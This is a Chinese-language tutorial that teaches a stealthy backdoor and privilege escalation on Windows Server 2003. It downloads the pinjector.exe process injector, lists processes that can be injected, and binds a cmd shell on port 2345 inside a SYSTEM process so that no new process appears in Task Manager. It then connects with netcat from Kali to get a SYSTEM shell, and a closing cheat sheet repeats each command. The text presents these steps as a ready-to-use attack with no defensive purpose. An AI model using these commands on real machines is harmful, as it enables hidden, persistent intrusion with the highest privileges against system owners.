注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】
注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。
下面是图文教程。
0x01
从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。放在windows2003server的c盘根目录。
0x02将压缩包中的pinjector.exe提取出放在c盘根目录。
0x03执行pinjector.exe -l 可查看可以注入的进程。
可以看到不同的进程对应不同PID和用户。
0x04执行pinjector.exe -p 600 cmd 2345 注入进程pid为600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程。
0x05使用kali的nc 192.168.70.135 2345
反弹shell并提权为system。
<script>
window.tctipConfig = {
staticPrefix: "http://static.tctip.com",
buttonImageId: 1,
buttonTip: "zanzhu",
list:{
alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},
weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},
}
};
</script>
<script src="http://static.tctip.com/js/tctip.min.js"></script>
#####################################################################################################################
总结
将进程注入system服务进程
pinjector.exe进程注入器
http://www.tarasco.org/security/Process_Injector/ {需要FQ下载}
###pinjector.exe -l#查看可注入进程
###pinjector.exe -p <PID> cmd <ports>
nc -nv <IP> <ports> //监听端口。成功后会反弹system的shell。